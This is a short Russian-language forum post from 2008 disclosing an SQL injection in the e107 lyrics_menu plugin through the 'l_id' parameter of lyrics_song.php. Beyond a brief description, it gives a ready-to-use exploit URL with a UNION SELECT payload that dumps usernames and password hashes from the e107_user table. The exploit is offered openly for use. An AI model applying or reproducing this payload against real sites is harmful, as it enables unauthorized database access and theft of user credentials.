
31.10.2008, 23:04
|
|
Участник форума
Регистрация: 03.06.2008
Сообщений: 111
Провел на форуме: 911872
Репутация:
36
|
|
SQL-инъекция в e107 Plugin lyrics_menu
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «l_id» сценарием lyrics_song.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
PHP код:
http://localhost/script_path/lyrics_song.php?l_id=[SQL1] or [SQL2]
[SQL1] = column number 15
-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+e107_user--
|
|
|